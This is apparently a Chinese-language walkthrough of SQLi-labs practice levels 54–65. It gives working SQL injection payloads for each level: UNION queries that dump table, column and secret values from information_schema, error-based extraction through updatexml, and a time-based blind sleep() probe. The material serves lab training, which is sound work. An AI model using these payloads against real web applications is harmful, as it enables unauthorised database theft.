LESS54
关卡要求:此挑战的目标是在不到10次的尝试中从数据库的随机表中转储(密钥 为了好玩,每次重置,挑战都会生成随机表名、列名和表数据。随时保持新鲜。
①判断列数(二分法)
输入:?id=1' order by 3--+
②当前数据库
输入:?id=-1' union select 1,2,database() --+
③查表
输入:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
9po9d7v0i2
④查字段
输入:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+
⑤查字段的值
输入:?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+
1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4
点击提交即可通过完毕。
把你这个愚蠢的黑客赶走!
LESS55
参数:(1)
次数:14次
LESS56
参数:(‘1’)
次数:14次
LESS57
参数:“1”
次数:14次
LESS58
次数:5次
这关不能使用 union select 没有返回回显位置。
我们使用报错注入。
①查表
数据库已知是challenges
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+
②查字段
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+
③查字段的值
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+
恭喜你成功了!
LESS59
参数 :id=1 无包裹
LESS60
参数:id=(“1”)
LESS61
参数:id=((‘1’))
LESS62
一共130次,显而易见盲注它来了!!
输入:?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+
改变它的值逐次判断即可。
LESS63
参数:‘1’
LESS64
参数:((1))
LESS65
参数:(“1”)